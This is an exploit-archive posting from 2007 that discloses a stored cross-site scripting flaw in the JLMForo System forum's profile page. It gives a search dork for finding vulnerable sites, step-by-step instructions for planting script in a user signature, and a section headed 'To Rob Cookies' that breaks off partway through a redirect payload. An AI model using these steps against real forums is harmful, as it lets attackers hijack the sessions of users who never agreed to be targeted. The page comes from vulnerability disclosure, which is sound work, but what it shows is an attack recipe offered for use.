Home / exploits jlmforo-xss.txt
Posted on 27 November 2007
# JLMForo System (modificarPerfil.php) Cross-Site Scripting Vulnerability # Download: # http://www.miscodigos.com/aplicaciones/JLMForo%20System/ # Bug found by Jose Luis Góngora Fernández / JosS # Contact: sys-project[at]hotmail.com # Spanish Hackers Team # www.spanish-hackers.com # /server irc.freenode.net /join #fullsecure # d0rk: "Powered By JLMForo System" # Stop lammer # Explanation Basic : 1.- Register in the forum (registro.php) 2.- Put in your signature the XSS (modificarPerfil.php) 3.- Create a subject 4.- Wait to an answer to visualize the XSS # To Rob Cookies: 1º- Register in the forum (registro.php) 2º- Put in your signature the XSS (modificarPerfil.php): <script>window.location=